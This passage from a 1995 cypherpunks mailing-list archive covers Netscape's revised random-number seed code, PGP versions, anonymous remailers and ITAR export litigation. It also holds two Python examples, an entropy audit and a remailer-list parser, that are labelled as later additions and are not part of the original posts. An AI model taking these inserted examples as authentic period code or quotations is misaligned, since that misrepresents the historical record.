A. Declaring that the provisions of the ITAR, as applied to Plaintiff KARN,
be declared null and void, of no effect, as unconstitutional under the Fifth
and First Amendments.

B. Declaring that the determination to subject the Diskette to the export
licensing controls of ITAR is unlawful in violation of the APA at 5 U.S.C.
706(2)(A) & (B).

C. For attorneys fees incurred herein.

D. For costs of the action incurred herein and

E. For such other and further relief as the Court deems just and proper.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 24 Sep 95 22:50:05 PDT
To: bret@bjohns.win.net (Bret A. Johnson)
Subject: Re: What version of PGP?
In-Reply-To: <1903@bjohns.win.net>
Message-ID: <199509250549.BAA20660@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I got PGP 262 off MIT.
> 
> The file was PGP262si.tar
> 
> Is this the international version with weak crypto? Or is it the US
> version?

Actually, the file you got was pgp262s.tar.gz (or something equivalent.)
Inside this tarfile you found pgp262si.tar, which is the Source, Internal
tarfile.  It is not an international version; it is the US version.

Also, neither the US version nor any international versions have weak 
crypto.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Mon, 25 Sep 95 00:25:41 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for Linux?
In-Reply-To: <445hso$h03@tera.mcom.com>
Message-ID: <199509250712.CAA01003@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> In article <199509242006.PAA02258@khijol>, khijol!erc@uunet.uu.net (Ed Carp [khijol SysAdmin]) writes:
> > > > And the sad part is that now that they have announced that they are
> > > > dropping their unofficial Linux support, 
> > > 
> > > I have no current plans to alter our treatment of Linux.  It is not now,
> > > nor has it ever been, a supported platform.  We do build for it,
> > > and some people are happy about that.
> > 
> > Does this mean that a Linux version of Netscape will no longer be 
> > available, or that it *will* be available but unsupported?
> 
>   It will be available as it has been in the past, which means unsupported.
> That means that if you have a bug, and you try to call us for help,
> we will not provide it.

As much as this might put me at odds with certain parts of the CP
community, this seems quite reasonable to me.  After all, why should
someone provide support for a platform which is not generating revenue? 

> > > I have not constructed a business case which would cause Netscape
> > > to begin support for Linux versions of the Navigator.  Right now, I'm 
> > > not sure that making a point of this would do what you want.
> > 
> > That all depends on what you mean by "support".  If you mean "we will no 
> > longer make Netscape available for the Linux platform", that's not 
> > support.  If you mean "we will no longer respond to bug reports for 
> > Netscape on this platform" then that's discontinuing support.
> 
>   We have never officially responded to bug reports on Linux.  We do not
> take money for it for just this reason.  This does not mean that we will
> not fix bugs that are reported via our feedback page.  It doesn't mean
> we will fix them either...

Understood.  Thanks for the clarification :)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGZWZCS9AwzY9LDxAQEacgQAmiibHw4Wn4JAudLHJ66dQDJhDoUMjzsR
Oh4cd7aYHL4PkSgb7INfS+mMQZ6/VYu7VTHVJchNAU5DxO0A7tljrbMnt+QWWjSx
5pEU0t5jRIScLhBdANSf24YfmBpc929gfUOkSldm0OopsAT9kurPY8qg1Yd/aVjs
XB7m9h/1BxE=
=wO2X
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 25 Sep 95 00:30:00 PDT
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: secure file system for Linux?
In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
Message-ID: <Pine.SUN.3.90.950925022726.7974A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto Filesystem works just fine.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 24 Sep 1995 Mike_Spreitzer.PARC@xerox.com wrote:

> Date: Sun, 24 Sep 1995 22:29:48 PDT
> From: Mike_Spreitzer.PARC@xerox.com
> To: cypherpunks@toad.com
> Cc: Mike_Spreitzer.PARC@xerox.com
> Subject: secure file system for Linux?
> 
> Is there a secure file system (or secure directory branch) for Linux?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@neon.netscape.com (Phil Karlton)
Date: Sun, 24 Sep 95 19:39:47 PDT
To: cypherpunks@toad.com
Subject: Netscape "random" number seed generator code available
Message-ID: <4454nu$da8@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Once again I speak for myself and not Netscape.

The random number seed generation code is now available for review:
	ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z
The README from that file is appended below.

Netscape has fixed other less glaring but potentially interesting
problems and those fixes will be included with the patch that goes out
in the near future.

As is mentioned in the README, more will need to be done to find more 
bits of entropy. (Too much of a good thing is still not enough.) 
However the security team believes that the RNG seed is no longer the 
weak link and candidate for attack.  So I am personally volunteering 
to have my head shaved if a discovered deficiency in this code results 
in an easily attacked generated seed. [You will be expected to show 
your work. :-)]


============================== README ===========================

This code represents the heart of Netscape's random number seed 
generator. The initialization routines are called by the various 
client front ends and servers and other Netscape software.  
Furthermore, the server will be putting seed information into the 
environment of each of the CGI invocations.

Here's some things a client does:
* Application specific files are passed to SEC_FileForRNG(). For the
client this includes the global history file. 
* The clients then read a portion of the screen depending upon the
current state of the hash.
* The Update functions feed into an MD5 hash. The MD5 code isn't ours
to publish.
* User input is used for server side key generation and in client 
front ends for increasing RNG state entropy over time.

This code needs to be portable. We can't access device specific
registers that are not guaranteed to be on all relevant platforms.

Recommendations to users of Netscape who rely on the security of
their transactions:

    If the attacker has physical access to your machine, security
    cannot be assured.

    Netscape continues to point out that if unwanted agents can log 
    into your machine, little can be secure.  For secure servers, any 
    insecure connection mechanism could be suspect.  Multi-user UNIX 
    platforms will not be as secure as single-user machines. 

	Details: Some of the system specific information that is used
	in the seed generation is available to any user on that
	system.

	To help mitigate this, the entire user environment is passed
	into the seed generation algorithm.  A wary user can alter his 
	user environment before running Netscape software.

	If someone can get root (superuser) access to your machine, 
	they can pretty much do anything.

    Netscape security could be weak if run on a platform emulator.
    Use a version native to the platform on which you are running.

	Details: Some of the usefulness of the seed generation depends
	upon the unpredictability of the low order bits of various
	clocks and timers. The clocks of many emulators may have 
	much less entropy than the actual builtin clocks.

    If you are running on a UNIX platform, make sure of the security
    of your X server.  This is also true if the X connection is not to 
    a local machine as all of the events and the data from the screen 
    read may be captured from the ethernet.

	Details: If the attacker is monitoring your user input then
	its randomness is not useful.

    It is better to perform some user action before connecting to a 
    secure site.  This means you should not set your home page to a 
    secure site or launch your client from a command line to a secure site.

	Details: While navigating through menus or typing into various form 
	fields, the Navigator uses the unpredictability of details of the 
	user actions to increase the entropy of the RNG state.

For this patch, proposed changes had to fit into the existing
code and UI structure.  We will rely on the user interactions leading 
to the initial secure page.

In future versions, the Navigator will force the user to explicitly
use the keyboard or mouse to help generate the initial seed before
doing any secure transactions. That seed will be maintained across
invocations of the Navigator.

The files are not compilable as is. They have been extracted from the
Netscape's cross platform build environment, and all of the headers
needed to compile them are not included.  They should be compilable
with some simple edits on their platforms (MFC on Windows, CodeWarrior 
on Mac).
=================================================================

PK
-- 
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 24 Sep 95 23:49:16 PDT
To: cypherpunks@toad.com
Subject: New Netscape RNG
Message-ID: <199509250649.CAA27099@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




  I just glanced at the new Netscape RNG source. I don't really see
anything bad, but I haven't analyzed it. However, I'm curious
as to why variables like the username or the language locality
are used as sources of entropy. These seem to provide almost nil.
The username is going to be pretty much constant. In fact, even
the current directory which is used as a seed can't provide more
than a few bits of entropy. In all probability, the user
name will usually be the same, and so will the current directory
(and how many directories are there? 65,000 would only give you
16 bits of entropy, assuming you get a directory listing from the machine)
 
 I'm thinking from the standpoint of someone gathering data on someone
or some server to mount a specific attack. a "most common directories
on the macintosh" file for instance could be used to attack the
current directory method.

  Using those sources probably can't hurt, they just seemed
like odd choices, "grasping for straws" so to speak.

  Nevertheless, I would like to commend Netscape for releasing
the source code for public review. You guys are clearly an intelligent
company, in both your current developments, but also the way
you have handled this bad press.

-Ray

p.s. i hope you guys do a good internal review of your code to remove
buffer overflow bugs
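
Added example (not part of the post above and not Netscape's code): an entropy audit of the kind of seed inputs discussed in this thread, showing that hashing near-constant values with MD5 yields a 128-bit seed drawn from a very small set. The candidate lists, the `mix` framing and the 128-bit requirement are assumptions constructed for illustration.

```python
import hashlib
import math
from itertools import product

# Constructed candidate sets: the values an outside observer would consider
# plausible for each seed input on one machine. All values are assumptions.
CANDIDATES = {
    "username": [b"alice"],                      # effectively constant
    "locale": [b"en_US", b"C"],
    "cwd": [b"/home/alice", b"/home/alice/bin", b"/tmp", b"/usr/local/bin"],
    "clock_low_bits": [bytes([i]) for i in range(256)],  # 8 unpredictable bits
}


def bits_for(n_candidates):
    """Entropy in bits of a uniform choice among n_candidates values."""
    return math.log2(n_candidates)


def mix(values):
    """Hash the inputs into a 128-bit seed, length-prefixing each field."""
    h = hashlib.md5()  # MD5 only because the README names it as the mixer
    for v in values:
        h.update(len(v).to_bytes(4, "big"))
        h.update(v)
    return h.digest()


def entropy_upper_bound(candidates):
    """Upper bound on seed entropy: sum of log2(set size) over all inputs."""
    return sum(bits_for(len(c)) for c in candidates.values())


def distinct_seeds(candidates):
    """Enumerate every input combination and count the distinct seeds."""
    return len({mix(combo) for combo in product(*candidates.values())})


def audit(candidates, required_bits=128):
    """Report per-input entropy, the total, and whether it is sufficient."""
    total = entropy_upper_bound(candidates)
    return {
        "per_source": {k: bits_for(len(c)) for k, c in candidates.items()},
        "total_bits": total,
        "seed_space": distinct_seeds(candidates),
        "meets_requirement": total >= required_bits,
    }


if __name__ == "__main__":
    report = audit(CANDIDATES)
    for name, bits in report["per_source"].items():
        print(f"{name:15s} {bits:5.1f} bits")
    print(f"total           {report['total_bits']:5.1f} bits "
          f"({report['seed_space']} distinct 128-bit seeds)")
    print("sufficient for a 128-bit seed:", report["meets_requirement"])
```

The hash output is always 128 bits long, but the seed can take no more values than the inputs can; the audit makes that gap explicit for each source.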

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 25 Sep 95 02:50:19 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE: Bryce's Auto-PGP v1.0 available for 10 cyberbucks
Message-ID: <199509250950.DAA27187@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I'm pleased to announce the release of "Bryce's Auto-PGP" version 1.0.


Bryce's Auto-PGP, a.k.a. "BAP", is a Unix script which makes it 
simple and convenient to use PGP with almost any Unix message-
handling application.  As far as I know there is no Unix
message-handling application that cannot be integrated with BAP.  BAP 
has been tested by me personally with Elm, Pine, mh and trn, and it 
has also turned out to be useful with such Unix utilities as finger
and vi.


I'm distributing BAP from my World Wide Web site:

http://www-ugrad.cs.colorado.edu/~wilcoxb/BAP.html


As an experiment in cyberspace economics, I am asking for 10
cyberbucks, the currency for the Internet created by DigiCash 
company in return for BAP.  To sign up for the cyberbuck trial 
and get your free cyberbucks visit:

http://www.digicash.com/ecash/ecash-home.html


If you have any problems acquiring or using BAP, please e-mail me.


Bryce

signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMGZ0jfWZSllhfG25AQHfHwP/YDqzy7B8YfnQ32Oe5kqLfyXvKWUf/cok
RObG3lt1pKz3NsuCFwZoJC1T4cmamMkEsEy9S2lcAT4GO4GlAMNm/Su4AdveuvYh
/UjHVf2a1wGLcdvq4bfVUV+ldrn2UJuKJno3X9kBP1ofvqANWusOpQvMsPLzQMQj
3K9Uy/ulDEA=
=bGwi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 25 Sep 95 10:14:56 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <445j6k$h03@tera.mcom.com>
Message-ID: <199509251159.EAA08528@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> jsw@neon.netscape.com (Jeff Weinstein) writes:
> More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> and feed it through the RNG hash.  On Unix and PC systems we feed the
> environment through the hash, so that would be a good place for a
> concerned user to put some random stuff of their own.

Interesting idea, but I have a (perhaps irrational) dislike for this idea.
If Netscape wants to have its own netsceed.bin file to muck around with on
my system, I'll authorize it to be set up, but I by god don't want it
mucking around with my PGP setup.  Network-aware programs must be more
trusted than local-only programs, because they are the only kind that
legitimately export information they glean from the local environment.  If
Netscape decided to ship the actual contents of my randseed.bin to
somebody else (like escrow.fbi.org, for example) it might give them a
better edge on finding session keys for my PGP sessions... the privacy of
which I value more even than I value my Netscape transactions.

I'm nervous enough about all the Easter Eggs that have been reported in
Netscape, like the secret keystroke shortcut to get to Fishcam, or the
different behavior it exhibits when it finds a certain obscurely-named
directory at the top level.  If it starts peeking at my PGP environment,
though, I'm drawing the line.  No, thanks.

In summary -- set up your own netsceed.bin if you want, but don't peek
at my PGP randomness.

	Jim Gillogly
	Trewesday, 4 Winterfilth S.R. 1995, 11:57




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:16:43 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240436.VAA28304@ix5.ix.netcom.com>
Message-ID: <445hej$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509241746.KAA01423@goblin.punk.net>, jsimmons@goblin.punk.net (Jeff Simmons) writes:
> As a Linux user and advocate, I've gotta agree here.  I'm glad that
> Netscape is going to continue to supply us with an unsupported binary,
> and I can't blame them a bit for not wanting to support an OS where
> every user has his own private version number ... would be nice if we
> could get 128 bit keys, though ... (hint, hint).

  We are working this issue with the government.  As soon as we can
make it available for download we will.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:24:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <445hso$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509242006.PAA02258@khijol>, khijol!erc@uunet.uu.net (Ed Carp [khijol SysAdmin]) writes:
> > > And the sad part is that now that they have announced that they are
> > > dropping their unofficial Linux support, 
> > 
> > I have no current plans to alter our treatment of Linux.  It is not now,
> > nor has it ever been, a supported platform.  We do build for it,
> > and some people are happy about that.
> 
> Does this mean that a Linux version of Netscape will no longer be 
> available, or that it *will* be available but unsupported?

  It will be available as it has been in the past, which means unsupported.
That means that if you have a bug, and you try to call us for help,
we will not provide it.

> > I have not constructed a business case which would cause Netscape
> > to begin support for Linux versions of the Navigator.  Right now, I'm 
> > not sure that making a point of this would do what you want.
> 
> That all depends on what you mean by "support".  If you mean "we will no 
> longer make Netscape available for the Linux platform", that's not 
> support.  If you mean "we will no longer respond to bug reports for 
> Netscape on this platform" then that's discontinuing support.

  We have never officially responded to bug reports on Linux.  We do not
take money for it for just this reason.  This does not mean that we will
not fix bugs that are reported via our feedback page.  It doesn't mean
we will fix them either...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 25 Sep 95 03:33:48 PDT
To: Cypherpunks@toad.com
Subject: Net Gambling on CNN
Message-ID: <Pine.SUN.3.91.950925062904.23639C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday's Point-Counterpoint on CNN, Sen. Richard Lugar who is pushing 
a Federal commission on gambling mentioned gambling on the Internet half 
a dozen times.  His motive seemed to be to give the Feds an excuse for 
getting involved in gambling control.  He also mentioned Federal 
regulation of Indian reservations in this context.  What he wants to do 
is discourage state promotion of gambling.

Net Gambling is really on the table.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:43:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <445j0o$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <4454nu$da8@tera.mcom.com>, karlton@neon.netscape.com (Phil Karlton) writes:
> 	Details: While navigating through menus or typing into various form 
> 	fields, the Navigator uses the unpredictability of details of the 
> 	user actions to increase the entropy of the RNG state.

  Note that clicking in the main window or on URLs, and timing of
network activity cause the state of the RNG to be updated.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 24 Sep 95 23:46:33 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <445j6k$h03@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
and feed it through the RNG hash.  On Unix and PC systems we feed the
environment through the hash, so that would be a good place for a
concerned user to put some random stuff of their own.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 10:08:09 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509251350.GAA05287@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
robo     robo@c2.org                      ##*#####+###     1:51  99.99%
hroller  hroller@c2.org                   ########+###     1:47  99.99%
syrinx   syrinx@c2.org                    -+++--+--+-+    51:38  99.98%
ford     remailer@bi-node.zerberus.de     +*--*++**+*#    16:30  99.98%
mix      mixmaster@remail.obscura.com     ._..-+.-++-   4:38:15  99.98%
crown    mixmaster@kether.alias.net       --++------++  1:51:07  99.97%
alumni   hal@alumni.caltech.edu           *+##+*-*##*#     6:32  99.97%
gondolin mixmaster@gondolin.org           --_.-+---+**  3:26:27  99.96%
hacktic  remailer@utopia.hacktic.nl       ++****+*****     9:35  99.95%
ecafe    remail@ecafe.org                        *--**    35:01  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           **#+*# #*#+#     7:02  99.83%
replay   remailer@replay.com              ++***- +**+*    10:10  99.75%
flame    remailer@flame.alias.net         ++**++ *****    25:42  99.74%
extropia remail@extropia.wimsey.com       ----.-.-.--  12:36:15  99.63%
rmadillo remailer@armadillo.com           +++ +  ++ ++    51:06  99.29%
spook    remailer@spook.alias.net         -----------   2:55:48  99.14%
portal   hfinney@shell.portal.com         #+####-##  #     5:37  98.89%
ideath   remailer@ideath.goldenbear.com   ---+__.-.-   12:16:28  98.18%
penet    anon@anon.penet.fi                * + - - ++   3:46:46  94.95%
c2       remail@c2.org                    *+ * +-  +++    49:41  94.46%
vishnu   mixmaster@vishnu.alias.net       +++-+++  *+*    23:25  93.99%
rahul    homer@rahul.net                  *#+#*****#*#     1:21  99.99%
ncognito ncognito@gate.net                ++               6:59   9.32%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
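
An added example, not part of Raph Levien's posting and not premail's code: a parser for the two parts of the listing above that applies a selection policy (required option keywords, no `mon` or `filter`, minimum uptime). The class and function names are hypothetical, the embedded rows are copied from the listing, and reading the latency column as [h:]mm:ss is an assumption.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Rows copied from the listing above (a subset), embedded so this runs offline.
LISTING = r'''
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
catalyst@netcom.com is _not_ a remailer.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
robo     robo@c2.org                      ##*#####+###     1:51  99.99%
mix      mixmaster@remail.obscura.com     ._..-+.-++-   4:38:15  99.98%
crown    mixmaster@kether.alias.net       --++------++  1:51:07  99.97%
flame    remailer@flame.alias.net         ++**++ *****    25:42  99.74%
penet    anon@anon.penet.fi                * + - - ++   3:46:46  94.95%
rahul    homer@rahul.net                  *#+#*****#*#     1:21  99.99%
'''

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d+)\s+(\d+(?:\.\d+)?)%$')


@dataclass
class Remailer:
    name: str
    address: str
    caps: frozenset
    pgp_key_id: Optional[str]       # None when the remailer does not list pgp
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def latency_seconds(text):
    """Convert [h:]mm:ss to seconds (assumed reading of the latency column)."""
    seconds = 0
    for part in text.split(":"):
        seconds = seconds * 60 + int(part)
    return seconds


def parse_listing(text):
    """Return {short name: Remailer}; lines matching neither format are skipped."""
    remailers = {}
    for raw in text.splitlines():
        line = raw.strip()
        cfg = CONFIG_RE.match(line)
        if cfg:
            name, address, options = cfg.groups()
            caps, key_id = set(), None
            for word in options.split():
                if word == "pgp.":
                    # Trailing period: the short name is the encryption key ID.
                    caps.add("pgp")
                    key_id = name
                elif word == "pgp":
                    # Plain keyword: the full address is the encryption key ID.
                    caps.add("pgp")
                    key_id = address
                else:
                    caps.add(word)
            remailers[name] = Remailer(name, address, frozenset(caps), key_id)
            continue
        row = STATS_RE.match(line)
        if row:
            name, address, history, latency, uptime = row.groups()
            entry = remailers.get(name)
            # Skip statistics for an unknown name or for an address that
            # disagrees with the configuration line of the same name.
            if entry and entry.address == address:
                entry.history = history   # column alignment is not preserved
                entry.latency_s = latency_seconds(latency)
                entry.uptime = float(uptime)
    return remailers


def select(remailers, require, exclude=("mon", "filter"), min_uptime=99.0):
    """Names that meet the capability and uptime policy, lowest latency first."""
    chosen = [r for r in remailers.values()
              if r.uptime is not None and r.uptime >= min_uptime
              and set(require) <= r.caps and not set(exclude) & r.caps]
    return [r.name for r in sorted(chosen, key=lambda r: r.latency_s)]
```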




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 25 Sep 95 10:12:28 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509200915.ZM14792@glacius.alias.com>
Message-ID: <9509251229.AA23816@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker writes:
 > FWIW, I discussed this code briefly with an engineer at Netscape a
 > while back . . . .

 > 	signal(SIGALRM,printbit);
 > 	alarm(1);
 > 	while (1)
 > 		count++;

I for one would be a little peeved if I found that my browser was
consuming all available CPU bandwidth on my workstation.  I also have
some doubts as to the randomness of this; I suspect that the kernel is
rather deterministic in its scheduling practices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



